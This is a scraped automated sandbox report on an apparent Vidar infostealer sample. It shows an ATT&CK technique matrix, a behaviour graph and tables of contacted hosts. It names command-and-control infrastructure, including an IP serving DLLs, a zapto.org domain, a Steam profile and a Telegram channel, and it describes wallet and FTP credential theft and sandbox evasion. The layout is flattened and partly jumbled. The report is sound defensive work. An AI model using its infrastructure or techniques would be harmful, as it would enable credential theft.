                    Archive Collected Data                    		2
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		2
                    Valid Accounts                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		3
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS27
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection                    		111
                    Masquerading                    		LSA Secrets1
                    Query Registry                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts                    		Cached Domain Credentials141
                    Security Software Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Virtualization/Sandbox Evasion                    		DCSync11
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1483190 Sample: file.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 47 steamcommunity.com 2->47 49 arpdabl.zapto.org 2->49 51 BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW 2->51 59 Found malware configuration 2->59 61 Antivirus detection for URL or domain 2->61 63 Yara detected Vidar 2->63 65 5 other signatures 2->65 10 file.exe 52 2->10         started        signatures3 process4 file5 43 C:\Users\user\AppData\Local\Temp\Ringtones, DOS 10->43 dropped 75 Found stalling execution ending in API Sleep call 10->75 14 cmd.exe 2 10->14         started        signatures6 process7 file8 45 C:\Users\user\AppData\Local\...\Buyer.pif, PE32 14->45 dropped 77 Drops PE files with a suspicious file extension 14->77 18 Buyer.pif 40 14->18         started        23 cmd.exe 2 14->23         started        25 conhost.exe 14->25         started        27 7 other processes 14->27 signatures9 process10 dnsIp11 53 steamcommunity.com 23.192.247.89, 443, 49704 AKAMAI-ASUS United States 18->53 55 5.75.212.60, 443, 49705, 49707 HETZNER-ASDE Germany 18->55 57 arpdabl.zapto.org 77.91.101.71, 49734, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 18->57 35 C:\ProgramData\vcruntime140.dll, PE32 18->35 dropped 37 C:\ProgramData\softokn3.dll, PE32 18->37 dropped 39 C:\ProgramData\nss3.dll, PE32 18->39 dropped 41 3 other files (none is malicious) 18->41 dropped 67 Found many strings related to Crypto-Wallets (likely being stolen) 18->67 69 Found API chain indicative of sandbox detection 18->69 71 Tries to harvest and steal ftp login credentials 18->71 73 2 other signatures 18->73 29 cmd.exe 1 18->29         started        file12 signatures13 process14 process15 31 conhost.exe 29->31         started        33 timeout.exe 1 29->33         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\freebl3.dll0%ReversingLabs
                    C:\ProgramData\mozglue.dll0%ReversingLabs
                    C:\ProgramData\msvcp140.dll0%ReversingLabs
                    C:\ProgramData\nss3.dll0%ReversingLabs
                    C:\ProgramData\softokn3.dll0%ReversingLabs
                    C:\ProgramData\vcruntime140.dll0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\447331\Buyer.pif0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
                    http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                    https://mozilla.org0/0%URL Reputationsafe
                    http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
                    https://www.ecosia.org/newtab/0%URL Reputationsafe
                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
                    https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%URL Reputationsafe
                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde74770%URL Reputationsafe
                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                    http://www.sqlite.org/copyright.html.0%URL Reputationsafe
                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
                    https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
                    https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                    https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                    https://5.75.212.60GDGDGHJKontent-Disposition:0%Avira URL Cloudsafe
                    http://arpdabl.zapto.org/z0%Avira URL Cloudsafe
                    https://5.75.212.60/sqls.dll100%Avira URL Cloudmalware
                    https://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%Avira URL Cloudsafe
                    https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
                    http://www.valvesoftware.com/legal.htm0%Avira URL Cloudsafe
                    https://www.autoitscript.com/autoit3/0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english0%Avira URL Cloudsafe
                    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/76561199747278259/badges100%Avira URL Cloudmalware
                    https://store.steampowered.com/privac0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_0%Avira URL Cloudsafe
                    http://arpdabl.zapto.GIDB0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e0%Avira URL Cloudsafe
                    https://steamcommunity.com/m0%Avira URL Cloudsafe
                    http://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                    https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
                    https://t.me/armad2a100%Avira URL Cloudmalware
                    https://5.75.212.60/softokn3.dlli100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%Avira URL Cloudsafe
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.00%Avira URL Cloudsafe
                    http://www.autoitscript.com/autoit3/X0%Avira URL Cloudsafe
                    https://store.steampowered.com/privacy_agreement/0%Avira URL Cloudsafe
                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%Avira URL Cloudsafe
                    https://5.75.212.60/H100%Avira URL Cloudmalware
                    http://arpdabl.zapto.org0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%Avira URL Cloudsafe
                    https://store.steampowered.com/about/0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%Avira URL Cloudsafe
                    https://steamcommunity.com/profiles/76561199747278259100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%Avira URL Cloudsafe
                    https://t.me/armad2ahellosqls.dllsqlite3.dllIn0%Avira URL Cloudsafe
                    https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
                    https://help.steampowered.com/en/0%Avira URL Cloudsafe
                    https://steamcommunity.com/market/0%Avira URL Cloudsafe
                    https://store.steampowered.com/news/0%Avira URL Cloudsafe
                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi0%Avira URL Cloudsafe
                    http://store.steampowered.com/subscriber_agreement/0%Avira URL Cloudsafe
                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
                    https://5.75.212.60/softokn3.dll100%Avira URL Cloudmalware
                    https://5.75.212.60/mozglue.dll100%Avira URL Cloudmalware
                    https://steamcommunity.com/profiles/76561199747278259/inventory/100%Avira URL Cloudmalware
                    http://arpdabl.zapto0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%Avira URL Cloudsafe
                    https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
                    https://store.steampowered.com/stats/0%Avira URL Cloudsafe
                    http://arpdabl.zapto.org/0%Avira URL Cloudsafe
                    https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%Avira URL Cloudsafe
                    https://5.75.212.60/100%Avira URL Cloudmalware
                    https://5.75.212.60/nss3.dll100%Avira URL Cloudmalware
                    https://5.75.212.60/freebl3.dll100%Avira URL Cloudmalware
                    https://store.steampowered.com/legal/0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a0%Avira URL Cloudsafe
                    http://64532127VdtSrezylanAPTHSymMatchStringInternetSetOptionAHttpQueryInfoAdbghelp.dllSetThreadCont0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%Avira URL Cloudsafe
                    https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
                    https://5.75.212.60/msvcp140.dll100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
                    https://5.75.212.60/nss3.dll=100%Avira URL Cloudmalware
                    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl0%Avira URL Cloudsafe
                    http://arpdabl.DAKFIDGIDB0%Avira URL Cloudsafe
                    https://store.steampowered.com/0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%Avira URL Cloudsafe
                    https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                    http://arpdabl.zapto.orgB0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh0%Avira URL Cloudsafe
                    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		23.192.247.89
                    		truetrue
                      		unknown
                      arpdabl.zapto.org
                      		77.91.101.71
                      		truefalse
                        		unknown
                        BOAbiVqkIfMQExjauBCLW.BOAbiVqkIfMQExjauBCLW
                        		unknown
                        		unknownfalse
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://5.75.212.60/sqls.dllfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://steamcommunity.com/profiles/76561199747278259true
                          • Avira URL Cloud: malware
                          		unknown
                          https://5.75.212.60/softokn3.dllfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://5.75.212.60/mozglue.dllfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://arpdabl.zapto.org/false
                          • Avira URL Cloud: safe
                          		unknown
                          https://5.75.212.60/false
                          • Avira URL Cloud: malware
                          		unknown
                          https://5.75.212.60/freebl3.dllfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://5.75.212.60/nss3.dllfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://5.75.212.60/msvcp140.dllfalse
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabHDGCAA.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://arpdabl.zapto.org/zBuyer.pif, 0000000B.00000002.2537444550.0000000003C57000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/ac/?q=HDGCAA.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/?subsection=broadcastsBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://5.75.212.60GDGDGHJKontent-Disposition:Buyer.pif, 0000000B.00000002.2537708757.000000000425E000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Buyer.pif, 0000000B.00000002.2537444550.0000000003C9D000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537288902.0000000003B16000.00000004.00000800.00020000.00000000.sdmp, BKFCAF.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://store.steampowered.com/subscriber_agreement/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.autoitscript.com/autoit3/file.exe, 00000000.00000003.1997318820.0000000002956000.00000004.00000020.00020000.00000000.sdmp, Deborah.0.dr, Buyer.pif.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.valvesoftware.com/legal.htmBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=englishBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=englishBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199747278259/badgesBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=enBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/privacBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://arpdabl.zapto.GIDBBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=eBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mozilla.com/en-US/blocklist/Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2561231245.000000006C44D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://steamcommunity.com/mBuyer.pif, 0000000B.00000002.2536907553.0000000001406000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishBuyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://mozilla.org0/Buyer.pif, 0000000B.00000002.2545100518.000000001386F000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2551950286.00000000256A1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2547386576.00000000197D0000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2556171611.000000003158B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr, freebl3.dll.11.dr, nss3.dll.11.dr, mozglue.dll.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://t.me/armad2aBuyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://store.steampowered.com/privacy_agreement/Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/points/shop/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://5.75.212.60/softokn3.dlliBuyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HDGCAA.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0Buyer.pif, 0000000B.00000002.2536816271.0000000001347000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130645867.0000000003C4B000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537199925.0000000003A7A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536907553.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130822576.00000000040FC000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000003.2130701171.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.00000000040F1000.00000040.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.autoitscript.com/autoit3/Xfile.exe, 00000000.00000003.1998402768.000000000295A000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2536238050.0000000001015000.00000002.00000001.01000000.00000006.sdmp, Desire.0.dr, Buyer.pif.2.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorErrorfile.exefalse
                          • URL Reputation: safe
                          		unknown
                          https://www.ecosia.org/newtab/HDGCAA.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAFIEGI.11.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://5.75.212.60/HBuyer.pif, 0000000B.00000002.2537111059.00000000039F7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://store.steampowered.com/privacy_agreement/Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Buyer.pif, 0000000B.00000002.2537444550.0000000003C4A000.00000004.00000800.00020000.00000000.sdmp, Buyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amBuyer.pif, 0000000B.00000002.2537708757.0000000004128000.00000040.00001000.00020000.00000000.sdmp, 76561199747278259[1].htm.11.drfalse
                          • Avira URL Cloud: safe
                          		unknown
